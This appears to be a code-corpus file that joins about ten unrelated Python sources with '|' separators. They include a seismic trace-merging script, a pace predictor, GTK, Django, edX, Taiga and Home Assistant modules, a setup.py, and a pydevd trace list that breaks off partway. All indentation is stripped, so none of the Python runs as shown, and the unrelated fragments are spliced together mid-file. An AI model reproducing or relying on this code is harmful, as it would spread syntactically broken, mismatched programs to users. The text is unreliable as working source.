i=line.split()[1]
x=line.split()[2]
if i in inline.keys():
inline[i].append(x)
else:
inline[i]=[x]
if (i,x) in loc.keys():
sys.stderr.write("duplicate location %s,%s\n"%(i,x))
sys.exit(2)
else:
loc[i,x]=[]
else:
loc[i,x]= loc[i,x] + line.split()
#for y in inline.keys():
#for x,v in inline[y].items():
#print y
#print inline[y]
# compute o2, d2, n2, o3, d3, and n3
n2=len(inline.keys())
d2=1. if n2==1 else float(inline.keys()[1])-float(inline.keys()[0])
o2=inline.keys()[0]
n3=len(inline[o2])
d3=1. if n3==1 else float(inline[o2][1])-float(inline[o2][0])
o3=inline[o2][0]
lock=multiprocessing.Lock()
#print "o2="+str(o2)+" d2="+str(d2)+" n2="+str(n2)+" o3="+str(o3)+" d3="+str(d3)+" n3="+str(n3)
jobs=[]
for y in loc.keys():
#myfunction(loc[y],n1,o1,d1)
p = multiprocessing.Process(target=myfunction, args=(lock,vs,loc[y],n1,o1,d1))
jobs.append(p)
p.start()
#print len(jobs)
for job in jobs:
job.join()
# concatinate traces in the second axis
cmd='''
%s axis=2 %s | %s n3=%d o3=%f d3=%f n2=%d o2=%f d2=%f label1=time label2=xline label3=inline| %s plane=23
'''%(sfcat,' '.join(vs),sfput,n2,float(o2),d2,n3,float(o3),d3,sftransp)
#cmd='%s axis=2 %s'%(sfcat,' '.join(vs))
#print cmd
subprocess.call(cmd,stdout=sys.stdout,shell=True)
# removing temp files of individual traces
for tmp in vs:
try:
subprocess.call(sfrm + ' ' + tmp,shell=True)
except:
pass
sys.exit(0)
|
from find_it import find_closest
from tm2secs2tm import time2secs, secs2time
def find_nearest_time(look_for, target_data):
what = time2secs(look_for)
where = [time2secs(t) for t in target_data]
res = find_closest(what, where)
return(secs2time(res))
row_data = {}
with open('PaceData.csv') as paces:
column_headings = paces.readline().strip().split(',')
column_headings.pop(0)
for each_line in paces:
row = each_line.strip().split(',')
row_label = row.pop(0)
inner_dict = {}
for i in range(len(column_headings)):
inner_dict[row[i]] = column_headings[i]
row_data[row_label] = inner_dict
distance_run = input('Enter the distance attempted: ')
recorded_time = input('Enter the recorded time: ')
predicted_distance = input('Enter the distance you want a prediction for: ')
closest_time = find_nearest_time(recorded_time, row_data[distance_run])
closest_column_heading = row_data[distance_run][closest_time]
prediction = [k for k in row_data[predicted_distance].keys()
if row_data[predicted_distance][k] == closest_column_heading]
print('The predicited time running ' + predicted_distance + ' is: ' + prediction[0] + '.')
|
"""
Copyright (C) 2012 Fabio Erculiani
Authors:
Fabio Erculiani
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; version 3.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
from threading import Lock, Semaphore
from gi.repository import Gtk, GLib, GObject, GdkPixbuf
from rigo.enums import Icons
from rigo.models.application import Application, ApplicationMetadata
from entropy.const import const_debug_write, const_debug_enabled
class AppListStore(Gtk.ListStore):
# column types
COL_TYPES = (GObject.TYPE_PYOBJECT,)
# column id
COL_ROW_DATA = 0
# default icon size returned by Application.get_icon()
ICON_SIZE = 48
_MISSING_ICON = None
_MISSING_ICON_MUTEX = Lock()
_ICON_CACHE = {}
__gsignals__ = {
# Redraw signal, requesting UI update
# for given pkg_match object
"redraw-request" : (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_PYOBJECT,),
),
# signal that all the elements in the List
# have vanished.
"all-vanished" : (GObject.SignalFlags.RUN_LAST,
None,
tuple(),
),
}
def __init__(self, entropy_client, entropy_ws, rigo_service,
view, icons):
Gtk.ListStore.__init__(self)
self._view = view
self._entropy = entropy_client
self._entropy_ws = entropy_ws
self._service = rigo_service
self._icons = icons
self.set_column_types(self.COL_TYPES)
# Startup Entropy Package Metadata daemon
ApplicationMetadata.start()
def clear(self):
"""
Clear ListStore content (and Icon Cache).
"""
outcome = Gtk.ListStore.clear(self)
AppListStore._ICON_CACHE.clear()
return outcome
@property
def _missing_icon(self):
"""
Return the missing icon Gtk.Image() if needed.
"""
if AppListStore._MISSING_ICON is not None:
return AppListStore._MISSING_ICON
with AppListStore._MISSING_ICON_MUTEX:
if AppListStore._MISSING_ICON is not None:
return AppListStore._MISSING_ICON
_missing_icon = self._icons.load_icon(
Icons.MISSING_APP, AppListStore.ICON_SIZE, 0)
AppListStore._MISSING_ICON = _missing_icon
return _missing_icon
def visible(self, pkg_match):
"""
Returns whether Application (through pkg_match) is still
visible in the TreeView.
This method shall be Thread safe.
"""
s_data = {
'sem': Semaphore(0),
'res': None,
}
def _get_visible(data):
res = False
try:
vis_data = self._view.get_visible_range()
if vis_data is None:
return
if len(vis_data) == 2:
# Gtk 3.4
valid_paths = True
start_path, end_path = vis_data
else:
# Gtk <3.2
valid_paths, start_path, end_path = vis_data
if not valid_paths:
return
path = start_path
while path <= end_path:
path_iter = self.get_iter(path)
if self.iter_is_valid(path_iter):
visible_pkg_match = self.get_value(path_iter, 0)
if visible_pkg_match == pkg_match:
res = True
return
path.next()
res = False
finally:
data['res'] = res
data['sem'].release()
GLib.idle_add(_get_visible, s_data)
s_data['sem'].acquire()
return s_data['res']
def get_icon(self, app, cached=False):
pkg_match = app.get_details().pkg
cached_icon = AppListStore._ICON_CACHE.get(pkg_match)
if cached_icon is not None:
return cached_icon
if cached:
# then return the default icon
return self._missing_icon
def _still_visible():
return self.visible(pkg_match)
icon, cache_hit = app.get_icon(
_still_visible_cb=_still_visible,
cached=cached)
if const_debug_enabled():
const_debug_write(__name__,
"get_icon({%s, %s}) = %s, hit: %s" % (
(pkg_match, app.name, icon, cache_hit,)))
if icon is None:
if cache_hit:
# this means that there is no icon for package
# and so we should not keep bugging underlying
# layers with requests
AppListStore._ICON_CACHE[pkg_match] = self._missing_icon
return self._missing_icon
icon_path = icon.local_document()
icon_path_exists = False
if icon_path:
icon_path_exists = os.path.isfile(icon_path)
if not icon_path_exists:
return self._missing_icon
try:
img = Gtk.Image.new_from_file(icon_path)
except GObject.GError:
return self._missing_icon
img_buf = img.get_pixbuf()
if img_buf is None:
# wth, invalid crap
return self._missing_icon
w, h = img_buf.get_width(), img_buf.get_height()
del img_buf
del img
if w < 1:
# not legit
return self._missing_icon
width = AppListStore.ICON_SIZE
height = width * h / w
try:
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(
icon_path, width, height)
except GObject.GError:
try:
os.remove(icon_path)
except OSError:
pass
return self._missing_icon
AppListStore._ICON_CACHE[pkg_match] = pixbuf
return pixbuf
def _vanished_callback(self, app):
"""
Remove elements that are marked as "vanished" due
to unavailable metadata.
"""
def _remove(_app):
pkg_match = _app.get_details().pkg
vis_data = self._view.get_visible_range()
if vis_data is None:
return
if len(vis_data) == 2:
# Gtk 3.4
valid_paths = True
start_path, end_path = vis_data
else:
# Gtk <3.2
valid_paths, start_path, end_path = vis_data
if not valid_paths:
return
path = start_path
while path <= end_path:
path_iter = self.get_iter(path)
if self.iter_is_valid(path_iter):
visible_pkg_match = self.get_value(path_iter, 0)
if visible_pkg_match == pkg_match:
self.remove(path_iter)
if len(self) == 0:
self.emit("all-vanished")
return
path.next()
GLib.idle_add(_remove, app)
def get_application(self, pkg_match):
def _ui_redraw_callback(*args):
if const_debug_enabled():
const_debug_write(__name__,
"_ui_redraw_callback()")
GLib.idle_add(self.emit, "redraw-request", pkg_match)
app = Application(self._entropy, self._entropy_ws,
self._service, pkg_match,
redraw_callback=_ui_redraw_callback,
vanished_callback=self._vanished_callback)
return app
|
from django.conf.urls import patterns, url
from .settings import EMAIL_CONFIRMATION
urlpatterns = patterns('nodeshot.community.profiles.views', # noqa
url(r'^profiles/$', 'profile_list', name='api_profile_list'),
url(r'^profiles/(?P<username>[-.\w]+)/$', 'profile_detail', name='api_profile_detail'),
url(r'^profiles/(?P<username>[-.\w]+)/nodes/$', 'user_nodes', name='api_user_nodes'),
url(r'^profiles/(?P<username>[-.\w]+)/social-links/$', 'user_social_links_list', name='api_user_social_links_list'),
url(r'^profiles/(?P<username>[-.\w]+)/social-links/(?P<pk>[0-9]+)/$', 'user_social_links_detail', name='api_user_social_links_detail'),
url(r'^account/$', 'account_detail', name='api_account_detail'),
url(r'^account/login/$', 'account_login', name='api_account_login'),
url(r'^account/logout/$', 'account_logout', name='api_account_logout'),
url(r'^account/password/$', 'account_password_change', name='api_account_password_change'),
url(r'^account/password/reset/$', 'account_password_reset_request_key', name='api_account_password_reset_request_key'),
url(r'^account/password/reset/(?P<uidb36>[0-9A-Za-z]+)-(?P<key>.+)/$', 'account_password_reset_from_key', name='api_account_password_reset_from_key'),
)
if EMAIL_CONFIRMATION:
urlpatterns += patterns('nodeshot.community.profiles.views', # noqa
url(r'^account/email/$', 'account_email_list', name='api_account_email_list'),
url(r'^account/email/(?P<pk>[0-9]+)/$', 'account_email_detail', name='api_account_email_detail'),
url(r'^account/email/(?P<pk>[0-9]+)/resend-confirmation/$', 'account_email_resend_confirmation', name='api_account_email_resend_confirmation'),
)
|
import os, sys, getopt, tempfile
opts, args = getopt.getopt(sys.argv[1:], "p:r:o:s")
pattern = replFile = outFile = ''
strip = False
for o, a in opts:
if '-p' == o:
pattern = a
elif '-r' == o:
replFile = a
elif '-o' == o:
outFile = a
elif '-s' == o:
strip = True
if args and pattern and replFile and os.path.isfile(replFile):
subst = open(replFile, "r").read()
if strip:
subst = subst.strip()
fpath = args[0]
if os.path.isfile(fpath):
fString = open(fpath, "r").read()
fString = fString.replace(pattern, subst)
if outFile:
open(outFile, "w+").write(fString)
else:
h, tmpFile = tempfile.mkstemp('', 'tmp', os.path.dirname(fpath))
os.write(h, fString)
os.close(h)
os.rename(fpath, fpath + '.tmp')
os.rename(tmpFile, fpath)
os.unlink(fpath + '.tmp')
|
"""
Dump the structure of a course as a JSON object.
The resulting JSON object has one entry for each module in the course:
{
"$module_url": {
"category": "$module_category",
"children": [$module_children_urls... ],
"metadata": {$module_metadata}
},
"$module_url": ....
...
}
"""
import json
from textwrap import dedent
from django.core.management.base import BaseCommand, CommandError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from xblock.fields import Scope
from xblock_discussion import DiscussionXBlock
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.inheritance import compute_inherited_metadata, own_metadata
FILTER_LIST = ['xml_attributes']
INHERITED_FILTER_LIST = ['children', 'xml_attributes']
class Command(BaseCommand): # lint-amnesty, pylint: disable=missing-class-docstring
help = dedent(__doc__).strip()
def add_arguments(self, parser):
parser.add_argument('course_id',
help='specifies the course to dump')
parser.add_argument('--modulestore',
default='default',
help='name of the modulestore')
parser.add_argument('--inherited',
action='store_true',
help='include inherited metadata')
parser.add_argument('--inherited_defaults',
action='store_true',
help='include default values of inherited metadata')
def handle(self, *args, **options):
# Get the modulestore
store = modulestore()
# Get the course data
try:
course_key = CourseKey.from_string(options['course_id'])
except InvalidKeyError:
raise CommandError("Invalid course_id") # lint-amnesty, pylint: disable=raise-missing-from
course = store.get_course(course_key)
if course is None:
raise CommandError("Invalid course_id")
# Precompute inherited metadata at the course level, if needed:
if options['inherited']:
compute_inherited_metadata(course)
# Convert course data to dictionary and dump it as JSON to stdout
info = dump_module(course, inherited=options['inherited'], defaults=options['inherited_defaults'])
return json.dumps(info, indent=2, sort_keys=True, default=str)
def dump_module(module, destination=None, inherited=False, defaults=False):
"""
Add the module and all its children to the destination dictionary in
as a flat structure.
"""
destination = destination if destination else {}
items = own_metadata(module)
# HACK: add discussion ids to list of items to export (AN-6696)
if isinstance(module, DiscussionXBlock) and 'discussion_id' not in items:
items['discussion_id'] = module.discussion_id
filtered_metadata = {k: v for k, v in items.items() if k not in FILTER_LIST}
destination[str(module.location)] = {
'category': module.location.block_type,
'children': [str(child) for child in getattr(module, 'children', [])],
'metadata': filtered_metadata,
}
if inherited:
# When calculating inherited metadata, don't include existing
# locally-defined metadata
inherited_metadata_filter_list = list(filtered_metadata.keys())
inherited_metadata_filter_list.extend(INHERITED_FILTER_LIST)
def is_inherited(field):
if field.name in inherited_metadata_filter_list:
return False
elif field.scope != Scope.settings:
return False
elif defaults:
return True
else:
return field.values != field.default
inherited_metadata = {field.name: field.read_json(module) for field in module.fields.values() if is_inherited(field)} # lint-amnesty, pylint: disable=line-too-long
destination[str(module.location)]['inherited_metadata'] = inherited_metadata
for child in module.get_children():
dump_module(child, destination, inherited, defaults)
return destination
|
import uuid
import os.path as path
from unidecode import unidecode
from django.template.defaultfilters import slugify
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from taiga.projects.history.services import make_key_from_model_object, take_snapshot
from taiga.timeline.service import build_project_namespace
from taiga.projects.references import sequences as seq
from taiga.projects.references import models as refs
from taiga.projects.userstories.models import RolePoints
from taiga.projects.services import find_invited_user
from . import serializers
_errors_log = {}
def get_errors(clear=True):
_errors = _errors_log.copy()
if clear:
_errors_log.clear()
return _errors
def add_errors(section, errors):
if section in _errors_log:
_errors_log[section].append(errors)
else:
_errors_log[section] = [errors]
def project_to_dict(project):
return serializers.ProjectExportSerializer(project).data
def store_project(data):
project_data = {}
for key, value in data.items():
excluded_fields = [
"default_points", "default_us_status", "default_task_status",
"default_priority", "default_severity", "default_issue_status",
"default_issue_type", "memberships", "points", "us_statuses",
"task_statuses", "issue_statuses", "priorities", "severities",
"issue_types", "userstorycustomattributes", "taskcustomattributes",
"issuecustomattributes", "roles", "milestones", "wiki_pages",
"wiki_links", "notify_policies", "user_stories", "issues", "tasks",
]
if key not in excluded_fields:
project_data[key] = value
serialized = serializers.ProjectExportSerializer(data=project_data)
if serialized.is_valid():
serialized.object._importing = True
serialized.object.save()
serialized.save_watchers()
return serialized
add_errors("project", serialized.errors)
return None
def _store_choice(project, data, field, serializer):
serialized = serializer(data=data)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized.object
add_errors(field, serialized.errors)
return None
def store_choices(project, data, field, serializer):
result = []
for choice_data in data.get(field, []):
result.append(_store_choice(project, choice_data, field, serializer))
return result
def _store_custom_attribute(project, data, field, serializer):
serialized = serializer(data=data)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized.object
add_errors(field, serialized.errors)
return None
def store_custom_attributes(project, data, field, serializer):
result = []
for custom_attribute_data in data.get(field, []):
result.append(_store_custom_attribute(project, custom_attribute_data, field, serializer))
return result
def store_custom_attributes_values(obj, data_values, obj_field, serializer_class):
data = {
obj_field: obj.id,
"attributes_values": data_values,
}
try:
custom_attributes_values = obj.custom_attributes_values
serializer = serializer_class(custom_attributes_values, data=data)
except ObjectDoesNotExist:
serializer = serializer_class(data=data)
if serializer.is_valid():
serializer.save()
return serializer
add_errors("custom_attributes_values", serializer.errors)
return None
def _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes, values):
ret = {}
for attr in custom_attributes:
value = values.get(attr["name"], None)
if value is not None:
ret[str(attr["id"])] = value
return ret
def store_role(project, role):
serialized = serializers.RoleExportSerializer(data=role)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized
add_errors("roles", serialized.errors)
return None
def store_roles(project, data):
results = []
for role in data.get("roles", []):
serialized = store_role(project, role)
if serialized:
results.append(serialized)
return results
def store_default_choices(project, data):
def helper(project, field, related, data):
if field in data:
value = related.all().get(name=data[field])
else:
value = related.all().first()
setattr(project, field, value)
helper(project, "default_points", project.points, data)
helper(project, "default_issue_type", project.issue_types, data)
helper(project, "default_issue_status", project.issue_statuses, data)
helper(project, "default_us_status", project.us_statuses, data)
helper(project, "default_task_status", project.task_statuses, data)
helper(project, "default_priority", project.priorities, data)
helper(project, "default_severity", project.severities, data)
project._importing = True
project.save()
def store_membership(project, membership):
serialized = serializers.MembershipExportSerializer(data=membership, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.object.token = str(uuid.uuid1())
serialized.object.user = find_invited_user(serialized.object.email,
default=serialized.object.user)
serialized.save()
return serialized
add_errors("memberships", serialized.errors)
return None
def store_memberships(project, data):
results = []
for membership in data.get("memberships", []):
results.append(store_membership(project, membership))
return results
def store_task(project, data):
if "status" not in data and project.default_task_status:
data["status"] = project.default_task_status.name
serialized = serializers.TaskExportSerializer(data=data, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
if serialized.object.ref:
sequence_name = refs.make_sequence_name(project)
if not seq.exists(sequence_name):
seq.create(sequence_name)
seq.set_max(sequence_name, serialized.object.ref)
else:
serialized.object.ref, _ = refs.make_reference(serialized.object, project)
serialized.object.save()
for task_attachment in data.get("attachments", []):
store_attachment(project, serialized.object, task_attachment)
history_entries = data.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
custom_attributes_values = data.get("custom_attributes_values", None)
if custom_attributes_values:
custom_attributes = serialized.object.project.taskcustomattributes.all().values('id', 'name')
custom_attributes_values = _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes,
custom_attributes_values)
store_custom_attributes_values(serialized.object, custom_attributes_values,
"task", serializers.TaskCustomAttributesValuesExportSerializer)
return serialized
add_errors("tasks", serialized.errors)
return None
def store_milestone(project, milestone):
serialized = serializers.MilestoneExportSerializer(data=milestone, project=project)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
serialized.save_watchers()
for task_without_us in milestone.get("tasks_without_us", []):
task_without_us["user_story"] = None
store_task(project, task_without_us)
return serialized
add_errors("milestones", serialized.errors)
return None
def store_attachment(project, obj, attachment):
serialized = serializers.AttachmentExportSerializer(data=attachment)
if serialized.is_valid():
serialized.object.content_type = ContentType.objects.get_for_model(obj.__class__)
serialized.object.object_id = obj.id
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object.size = serialized.object.attached_file.size
serialized.object.name = path.basename(serialized.object.attached_file.name)
serialized.save()
return serialized
add_errors("attachments", serialized.errors)
return serialized
def store_timeline_entry(project, timeline):
serialized = serializers.TimelineExportSerializer(data=timeline, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
serialized.object.namespace = build_project_namespace(project)
serialized.object.object_id = project.id
serialized.object._importing = True
serialized.save()
return serialized
add_errors("timeline", serialized.errors)
return serialized
def store_history(project, obj, history):
serialized = serializers.HistoryExportSerializer(data=history, context={"project": project})
if serialized.is_valid():
serialized.object.key = make_key_from_model_object(obj)
if serialized.object.diff is None:
serialized.object.diff = []
serialized.object._importing = True
serialized.save()
return serialized
add_errors("history", serialized.errors)
return serialized
def store_wiki_page(project, wiki_page):
wiki_page["slug"] = slugify(unidecode(wiki_page.get("slug", "")))
serialized = serializers.WikiPageExportSerializer(data=wiki_page)
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
for attachment in wiki_page.get("attachments", []):
store_attachment(project, serialized.object, attachment)
history_entries = wiki_page.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
return serialized
add_errors("wiki_pages", serialized.errors)
return None
def store_wiki_link(project, wiki_link):
serialized = serializers.WikiLinkExportSerializer(data=wiki_link)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized
add_errors("wiki_links", serialized.errors)
return None
def store_role_point(project, us, role_point):
serialized = serializers.RolePointsExportSerializer(data=role_point, context={"project": project})
if serialized.is_valid():
try:
existing_role_point = us.role_points.get(role=serialized.object.role)
existing_role_point.points = serialized.object.points
existing_role_point.save()
return existing_role_point
except RolePoints.DoesNotExist:
serialized.object.user_story = us
serialized.save()
return serialized.object
add_errors("role_points", serialized.errors)
return None
def store_user_story(project, data):
if "status" not in data and project.default_us_status:
data["status"] = project.default_us_status.name
us_data = {key: value for key, value in data.items() if key not in ["role_points", "custom_attributes_values"]}
serialized = serializers.UserStoryExportSerializer(data=us_data, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
if serialized.object.ref:
sequence_name = refs.make_sequence_name(project)
if not seq.exists(sequence_name):
seq.create(sequence_name)
seq.set_max(sequence_name, serialized.object.ref)
else:
serialized.object.ref, _ = refs.make_reference(serialized.object, project)
serialized.object.save()
for us_attachment in data.get("attachments", []):
store_attachment(project, serialized.object, us_attachment)
for role_point in data.get("role_points", []):
store_role_point(project, serialized.object, role_point)
history_entries = data.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
custom_attributes_values = data.get("custom_attributes_values", None)
if custom_attributes_values:
custom_attributes = serialized.object.project.userstorycustomattributes.all().values('id', 'name')
custom_attributes_values = _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes,
custom_attributes_values)
store_custom_attributes_values(serialized.object, custom_attributes_values,
"user_story", serializers.UserStoryCustomAttributesValuesExportSerializer)
return serialized
add_errors("user_stories", serialized.errors)
return None
def store_issue(project, data):
serialized = serializers.IssueExportSerializer(data=data, context={"project": project})
if "type" not in data and project.default_issue_type:
data["type"] = project.default_issue_type.name
if "status" not in data and project.default_issue_status:
data["status"] = project.default_issue_status.name
if "priority" not in data and project.default_priority:
data["priority"] = project.default_priority.name
if "severity" not in data and project.default_severity:
data["severity"] = project.default_severity.name
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
if serialized.object.ref:
sequence_name = refs.make_sequence_name(project)
if not seq.exists(sequence_name):
seq.create(sequence_name)
seq.set_max(sequence_name, serialized.object.ref)
else:
serialized.object.ref, _ = refs.make_reference(serialized.object, project)
serialized.object.save()
for attachment in data.get("attachments", []):
store_attachment(project, serialized.object, attachment)
history_entries = data.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
custom_attributes_values = data.get("custom_attributes_values", None)
if custom_attributes_values:
custom_attributes = serialized.object.project.issuecustomattributes.all().values('id', 'name')
custom_attributes_values = _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes,
custom_attributes_values)
store_custom_attributes_values(serialized.object, custom_attributes_values,
"issue", serializers.IssueCustomAttributesValuesExportSerializer)
return serialized
add_errors("issues", serialized.errors)
return None
|
from ez_setup import use_setuptools
use_setuptools()
import os.path
import re
import sys
from setuptools import setup, find_packages
directory = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(directory, "version.txt")
version_string = open(path).readline()
match = re.match(r"\s*(?P<rel>(?P<ver>\d+\.\d+)(?:\.\S+)*)\s*", version_string)
version = match.group("ver")
release = match.group("rel")
def read(*names):
return open(os.path.join(os.path.dirname(__file__), *names)).read()
setup(
name = "dragonfly",
version = release,
description = "Speech recognition extension library",
author = "Christo Butcher",
author_email = "dist.dragonfly@twizzy.biz",
license = "LICENSE.txt",
url = "https://github.com/t4ngo/dragonfly",
zip_safe = False, # To unzip documentation files.
long_description = read("README.md"),
install_requires=[
"setuptools >= 0.6c7",
"pywin32",
],
classifiers=[
"Environment :: Win32 (MS Windows)",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: "
"GNU Library or Lesser General Public License (LGPL)",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python",
],
packages=find_packages(),
test_suite="dragonfly.test.suites.natlink_suite",
)
|
"""Local implementation of OAuth2 specific to Ondilo to hard code client id and secret and return a proper name."""
from homeassistant.core import HomeAssistant
from homeassistant.helpers.config_entry_oauth2_flow import LocalOAuth2Implementation
from .const import (
DOMAIN,
OAUTH2_AUTHORIZE,
OAUTH2_CLIENTID,
OAUTH2_CLIENTSECRET,
OAUTH2_TOKEN,
)
class OndiloOauth2Implementation(LocalOAuth2Implementation):
"""Local implementation of OAuth2 specific to Ondilo to hard code client id and secret and return a proper name."""
def __init__(self, hass: HomeAssistant):
"""Just init default class with default values."""
super().__init__(
hass,
DOMAIN,
OAUTH2_CLIENTID,
OAUTH2_CLIENTSECRET,
OAUTH2_AUTHORIZE,
OAUTH2_TOKEN,
)
@property
def name(self) -> str:
"""Name of the implementation."""
return "Ondilo"
|
from _pydevd_bundle.pydevd_constants import IS_PY3K
LIB_FILE = 1
PYDEV_FILE = 2
DONT_TRACE = {
# commonly used things from the stdlib that we don't want to trace
'Queue.py':LIB_FILE,
'queue.py':LIB_FILE,
'socket.py':LIB_FILE,
'weakref.py':LIB_FILE,
'_weakrefset.py':LIB_FILE,
'linecache.py':LIB_FILE,
'threading.py':LIB_FILE,
'dis.py':LIB_FILE,
#things from pydev that we don't want to trace
'_pydev_BaseHTTPServer.py': PYDEV_FILE,
'_pydev_SimpleXMLRPCServer.py': PYDEV_FILE,
'_pydev_SocketServer.py': PYDEV_FILE,
'_pydev_calltip_util.py': PYDEV_FILE,
'_pydev_completer.py': PYDEV_FILE,
'_pydev_execfile.py': PYDEV_FILE,
'_pydev_filesystem_encoding.py': PYDEV_FILE,
'_pydev_getopt.py': PYDEV_FILE,
'_pydev_imports_tipper.py': PYDEV_FILE,
'_pydev_inspect.py': PYDEV_FILE,
'_pydev_jy_imports_tipper.py': PYDEV_FILE,
'_pydev_log.py': PYDEV_FILE,
'_pydev_pkgutil_old.py': PYDEV_FILE,
'_pydev_saved_modules.py': PYDEV_FILE,
'_pydev_sys_patch.py': PYDEV_FILE,
'_pydev_tipper_common.py': PYDEV_FILE,
'_pydev_xmlrpclib.py': PYDEV_FILE,
'django_debug.py': PYDEV_FILE,
'fix_getpass.py': PYDEV_FILE,
'jinja2_debug.py': PYDEV_FILE,
'pycompletionserver.py': PYDEV_FILE,
'pydev_app_engine_debug_startup.py': PYDEV_FILE,
'pydev_code_executor.py': PYDEV_FILE,
'pydev_console_commands.py': PYDEV_FILE,
'pydev_console_types.py': PYDEV_FILE,
'pydev_console_utils.py': PYDEV_FILE,
'pydev_import_hook.py': PYDEV_FILE,
'pydev_imports.py': PYDEV_FILE,
'pydev_io.py': PYDEV_FILE,
'pydev_ipython_code_executor.py': PYDEV_FILE,
'pydev_ipython_completer.py': PYDEV_FILE,
'pydev_ipython_console.py': PYDEV_FILE,
'pydev_ipython_console_011.py': PYDEV_FILE,
'pydev_ipython_rich_output.py': PYDEV_FILE,
'pydev_is_thread_alive.py': PYDEV_FILE,
'pydev_localhost.py': PYDEV_FILE,
'pydev_log.py': PYDEV_FILE,
'pydev_monkey.py': PYDEV_FILE,
'pydev_monkey_qt.py': PYDEV_FILE,
'pydev_override.py': PYDEV_FILE,
'pydev_protocol.py': PYDEV_FILE,
'pydev_rpc.py': PYDEV_FILE,
'pydev_server.py': PYDEV_FILE,
'pydev_stdin.py': PYDEV_FILE,
'pydev_transport.py': PYDEV_FILE,
'pydev_umd.py': PYDEV_FILE,
'pydev_versioncheck.py': PYDEV_FILE,
'pydevconsole.py': PYDEV_FILE,
'pydevconsole_code_for_ironpython.py': PYDEV_FILE,
'pydevd.py': PYDEV_FILE,
'pydevd_additional_thread_info.py': PYDEV_FILE,
'pydevd_additional_thread_info_regular.py': PYDEV_FILE,
'pydevd_breakpointhook.py': PYDEV_FILE,
'pydevd_breakpoints.py': PYDEV_FILE,
'pydevd_bytecode_utils.py': PYDEV_FILE,
'pydevd_collect_try_except_info.py': PYDEV_FILE,
'pydevd_comm.py': PYDEV_FILE,
'pydevd_comm_constants.py': PYDEV_FILE,
'pydevd_command_line_handling.py': PYDEV_FILE,
'pydevd_concurrency_logger.py': PYDEV_FILE,
'pydevd_console.py': PYDEV_FILE,
'pydevd_console_integration.py': PYDEV_FILE,
'pydevd_console_pytest.py': PYDEV_FILE,
'pydevd_constants.py': PYDEV_FILE,
'pydevd_custom_frames.py': PYDEV_FILE,
'pydevd_cython_wrapper.py': PYDEV_FILE,
'pydevd_dont_trace.py': PYDEV_FILE,
'pydevd_dont_trace_files.py': PYDEV_FILE,
'pydevd_exec.py': PYDEV_FILE,
'pydevd_exec2.py': PYDEV_FILE,
'pydevd_extension_api.py': PYDEV_FILE,
'pydevd_extension_utils.py': PYDEV_FILE,
'pydevd_file_utils.py': PYDEV_FILE,
'pydevd_frame.py': PYDEV_FILE,
'pydevd_frame_eval_cython_wrapper.py': PYDEV_FILE,
'pydevd_frame_eval_main.py': PYDEV_FILE,
'pydevd_frame_tracing.py': PYDEV_FILE,
'pydevd_frame_utils.py': PYDEV_FILE,
'pydevd_helpers.py': PYDEV_FILE,
'pydevd_import_class.py': PYDEV_FILE,
'pydevd_io.py': PYDEV_FILE,
'pydevd_kill_all_pydevd_threads.py': PYDEV_FILE,
'pydevd_modify_bytecode.py': PYDEV_FILE,
'pydevd_plugin_numpy_types.py': PYDEV_FILE,
'pydevd_plugin_utils.py': PYDEV_FILE,
'pydevd_plugins_django_form_str.py': PYDEV_FILE,
'pydevd_process_net_command.py': PYDEV_FILE,
'pydevd_pycharm.py': PYDEV_FILE,
'pydevd_referrers.py': PYDEV_FILE,
'pydevd_reload.py': PYDEV_FILE,
'pydevd_resolver.py': PYDEV_FILE,
'pydevd_save_locals.py': PYDEV_FILE,
'pydevd_signature.py': PYDEV_FILE,
